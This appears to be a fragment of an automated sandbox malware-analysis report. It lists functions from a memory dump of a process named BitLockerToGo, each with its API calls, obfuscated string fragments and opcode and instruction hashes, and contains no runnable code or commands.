                                                                                                                                                                  • Opcode ID: df06273120b631677fd9f5fdf961946a1f8f7c921f65f6f5fea2bf04b46c8196
                                                                                                                                                                  • Instruction ID: ac4e0719852a63273a9e95c47e738ab7d42e72c534d584cce0c5c8299c3684ee
                                                                                                                                                                  • Opcode Fuzzy Hash: df06273120b631677fd9f5fdf961946a1f8f7c921f65f6f5fea2bf04b46c8196
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A518B315087818BD71ACF28C4D426ABFE2EFC5208F188A9DECD59B391D775D909CB92
                                                                                                                                                                  Function 02B47652 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e62d7083be51019f91f634df4796c64f4a2c8e8c599a1206f21c7ae91185edd6
                                                                                                                                                                  • Instruction ID: d00a01198e4fe1bffc24fd47d864c02cb901f70d054054e9d86e07fd8c731267
                                                                                                                                                                  • Opcode Fuzzy Hash: e62d7083be51019f91f634df4796c64f4a2c8e8c599a1206f21c7ae91185edd6
                                                                                                                                                                  • Instruction Fuzzy Hash: AF5187B4E0021ACFCB04CF94D491ABEFBB1FB0A341F9048A9D601AB341DB35A851DF90
                                                                                                                                                                  Function 02B4B210 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2081f7bcc195f21368b261c2ed9050e98483371a2db2109ca1e12e5f6eb91e1d
                                                                                                                                                                  • Instruction ID: 7a36c52b5af37b4e972849d0d782db067df7d6c6af2ca90b22705aec85beca29
                                                                                                                                                                  • Opcode Fuzzy Hash: 2081f7bcc195f21368b261c2ed9050e98483371a2db2109ca1e12e5f6eb91e1d
                                                                                                                                                                  • Instruction Fuzzy Hash: FE41BC74A08300ABD7149A15D8C0B2EBBB6EF85B1CF14CC5CE6C99B251DB31D810EB52
                                                                                                                                                                  Function 02B4B3A0 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 587171596eac71b21dc47ba66589a33f707a339441bf89a57d46b30154d08746
                                                                                                                                                                  • Instruction ID: d9799227fe31ca982573f81bc97f5c4e734988f430161b06b9cefdc1b0175895
                                                                                                                                                                  • Opcode Fuzzy Hash: 587171596eac71b21dc47ba66589a33f707a339441bf89a57d46b30154d08746
                                                                                                                                                                  • Instruction Fuzzy Hash: 5741A174A08300ABD7149B14D8D0B2BBBF9EF85758F588C5CE6899B241DB71D810DB52
                                                                                                                                                                  Function 02B112D0 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e56474b0467a17d4c3aa420a9e33502ab3f70171b67b1a98a9673aedcc70e788
                                                                                                                                                                  • Instruction ID: 6a1c847c32566c78e182a6086288879d8eccb252202c34c2e549189220152a86
                                                                                                                                                                  • Opcode Fuzzy Hash: e56474b0467a17d4c3aa420a9e33502ab3f70171b67b1a98a9673aedcc70e788
                                                                                                                                                                  • Instruction Fuzzy Hash: D3412672A2C3605FD318CE3E889012ABBD2ABC5210F49C77DF1E9C7684E674C605D751
                                                                                                                                                                  Function 02B04B00 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8612f004dc426f90c0e45edb8f8cc3a543c42061a42a79024b1796c45c7e50cf
                                                                                                                                                                  • Instruction ID: c42293a40ffe14219aa5638e1c2d2c915f575a0b3062d0afa6683e9cf02575c9
                                                                                                                                                                  • Opcode Fuzzy Hash: 8612f004dc426f90c0e45edb8f8cc3a543c42061a42a79024b1796c45c7e50cf
                                                                                                                                                                  • Instruction Fuzzy Hash: D731B8356082019FD7169E18C8C0B26BFF5EFC8358F1889ADE999C72D1D335D842CB46
                                                                                                                                                                  Function 02B3C0D0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                  • Instruction ID: 8e27ed77719abfa2e7d5cc045ca6727e89be94f951b8eeacccd06533dfa987ee
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 0611A933A055D40EC3178D7C8800565BFA34BA3535F5943DAF4B8AB2D2D6268DCA9395
                                                                                                                                                                  Function 02B30FB0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 46d108d8f11a70339da4666a47fcdcfb009f378527277655ff4912a59d769f85
                                                                                                                                                                  • Instruction ID: ce80f1e0d0d26ad7490fdd2daa481e5c2dd63f582382ae26ade02ccfe44c93a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 46d108d8f11a70339da4666a47fcdcfb009f378527277655ff4912a59d769f85
                                                                                                                                                                  • Instruction Fuzzy Hash: A90184F561034147D722BE68A4D0B2BB6ADEF94708F1949BCD90897241DB75E805CAA1
                                                                                                                                                                  Function 02B07070 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 50f7db22c8c368b38d07aecaae640ab2574391c71e820e0993090229ee49ce97
                                                                                                                                                                  • Instruction ID: e881860c5988d8d75f21da6d3909c1aee1fd9fd1ce12cac325ac7e46b7b4b2d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 50f7db22c8c368b38d07aecaae640ab2574391c71e820e0993090229ee49ce97
                                                                                                                                                                  • Instruction Fuzzy Hash: 40F0F63AB5821A0BE311CC69DCC0D6BF796EBC5258B188638E540D3345D975F912E290
                                                                                                                                                                  Function 02B1B710 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4ec611e8aa78381564fe05aaf26343caa36db7d6606f8415fc4f0b16d97f03a7
                                                                                                                                                                  • Instruction ID: e27ef219f720db006d00a2662230d51a5bf340e1f3acf5f5ea11bb4f3f908556
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ec611e8aa78381564fe05aaf26343caa36db7d6606f8415fc4f0b16d97f03a7
                                                                                                                                                                  • Instruction Fuzzy Hash: C6F02BB2B042101BDF329A59DCC0F37BB9CCFCB26CF5918A5F88597102D261A844C7E6
                                                                                                                                                                  Function 02B42480 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                  • Instruction ID: ef45bffc9909177aa8b6a165f2692f0aa10a49a7885f6db9e0646cfec3c0b44b
                                                                                                                                                                  • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                  • Instruction Fuzzy Hash: A7D0A521508321466B748E199441577F7F0EFC7611F8D555EFA81D3148D730D841E169
                                                                                                                                                                  Function 02B38B93 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 147memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                  • String ID: $+$0$3$6$<$U$[$b$i$m$n$q$s$v$}$~
                                                                                                                                                                  • API String ID: 2525500382-3006880669
                                                                                                                                                                  • Opcode ID: edcfb73e9b4a465b2283caad527c328a9ca77bf1300530304ae9624534173ef4
                                                                                                                                                                  • Instruction ID: 6ef8b1797c6f5a53ecd792a16e0435c9562444fe35d947eb5062445a38c3fd4e
                                                                                                                                                                  • Opcode Fuzzy Hash: edcfb73e9b4a465b2283caad527c328a9ca77bf1300530304ae9624534173ef4
                                                                                                                                                                  • Instruction Fuzzy Hash: DE91A56050C7C18ED332DA3C844875FBFE16BA6224F584A8DE1E94B3E2C7B58549DB63
                                                                                                                                                                  Function 02B385E6 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 144memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocString
                                                                                                                                                                  • String ID: $+$0$3$6$<$U$[$b$i$m$n$q$s$v$}$~
                                                                                                                                                                  • API String ID: 2525500382-3006880669
                                                                                                                                                                  • Opcode ID: 41e609e91262d7ce23172dd6502614a9b1288311715298362ff3d7293408dfa0
                                                                                                                                                                  • Instruction ID: 1059683d946c8fa410628a43dde7c4c6cab108d7398776b18444d39d08d83170
                                                                                                                                                                  • Opcode Fuzzy Hash: 41e609e91262d7ce23172dd6502614a9b1288311715298362ff3d7293408dfa0
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B91806050CBC1CED332DA38844875EBFD16BA7224F184A9DE1E98B3E2C7B59505DB63
                                                                                                                                                                  Function 02B12589 Relevance: 19.6, APIs: 3, Strings: 8, Instructions: 332COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02B125AB
                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02B128CC
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 02B12932
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryInitializeSecuritySystemUninitialize
                                                                                                                                                                  • String ID: )>=.$1'kc$6 %.$74t%$>,U&$^GFA$vi|7$oi
                                                                                                                                                                  • API String ID: 1555113959-4155201850
                                                                                                                                                                  • Opcode ID: ae645e7ae1b7d813251090607c14dcc1b73a3fbe6adeafcab5ee623c86e75f45
                                                                                                                                                                  • Instruction ID: 59dbf23e4b5c064bc7875ac786d5eed92722e3968d59fbefed7e26f7753eb485
                                                                                                                                                                  • Opcode Fuzzy Hash: ae645e7ae1b7d813251090607c14dcc1b73a3fbe6adeafcab5ee623c86e75f45
                                                                                                                                                                  • Instruction Fuzzy Hash: DEB165B85003909FD7258F19D490B26BBF1FF1A348FA4499CE9C68F252D736A856CF90
                                                                                                                                                                  Function 02B37CF1 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 79COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                  • String ID: A$C$E$G$I$K$M$O
                                                                                                                                                                  • API String ID: 2610073882-1863964857
                                                                                                                                                                  • Opcode ID: c97f5f3b995256934e72dab406047c5f84a8dbb6228e66abd9061da4f3bbc813
                                                                                                                                                                  • Instruction ID: 1d7c9e09310145eca88fe009b98e7cc8bcca91bf90c24ca7547efa79ccd097e4
                                                                                                                                                                  • Opcode Fuzzy Hash: c97f5f3b995256934e72dab406047c5f84a8dbb6228e66abd9061da4f3bbc813
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D41E57000C7C1DAD362DB28858879EBFE1AB96318F480A9CF5E94B392D7748549CB57
                                                                                                                                                                  Function 02B37EBE Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 72COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                                                                  • String ID: A$C$E$G$I$K$M$O
                                                                                                                                                                  • API String ID: 2610073882-1863964857
                                                                                                                                                                  • Opcode ID: 49f42258eefbf3fc4f6c1eb57f03e43eee4a4943a5317d7518ecbbef6ddfec1e
                                                                                                                                                                  • Instruction ID: 21e06d875d5d2fc9713518ae6956850c8a1fb7fcfeb542c1087b820b764ae2ed
                                                                                                                                                                  • Opcode Fuzzy Hash: 49f42258eefbf3fc4f6c1eb57f03e43eee4a4943a5317d7518ecbbef6ddfec1e
                                                                                                                                                                  • Instruction Fuzzy Hash: 6341077000C7C1DED361DB28848875EBFE06B96228F440E9CF5E98B3A2C7748549CB57
                                                                                                                                                                  Function 02B388D9 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 89COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitVariant
                                                                                                                                                                  • String ID: Q$S$U$W$Y$[$]$_
                                                                                                                                                                  • API String ID: 1927566239-2615533518
                                                                                                                                                                  • Opcode ID: 9c9382bb419bb2d661a4c30615099826d2e8020cfcde7e63f89ef5a4bc5ea8e1
                                                                                                                                                                  • Instruction ID: 76645d8f726a72d814e0c6e459af56d4189de625ef8210736f873bbc3d2974cc
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c9382bb419bb2d661a4c30615099826d2e8020cfcde7e63f89ef5a4bc5ea8e1
                                                                                                                                                                  • Instruction Fuzzy Hash: E751AF7410C7C18ED3329B2884987DBBFE1AB96324F084A9DE0E98B2D2C7794555CB67
                                                                                                                                                                  Function 02B33167 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 248COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: !2)'$--',$5:2?
                                                                                                                                                                  • API String ID: 0-1620781291
                                                                                                                                                                  • Opcode ID: 17f9730267707a5a44c76951554838f13e1648186461536a4cf233fdea4b4b2b
                                                                                                                                                                  • Instruction ID: eed72ba21e52ce62b6f4971f6b409a3e162c07f68c1228a36f8b0cba8235ef4d
                                                                                                                                                                  • Opcode Fuzzy Hash: 17f9730267707a5a44c76951554838f13e1648186461536a4cf233fdea4b4b2b
                                                                                                                                                                  • Instruction Fuzzy Hash: 9281D371544B408FE3228F25C880BA7BBE2BF92314F18899DD4EA4B792DB75B445CB91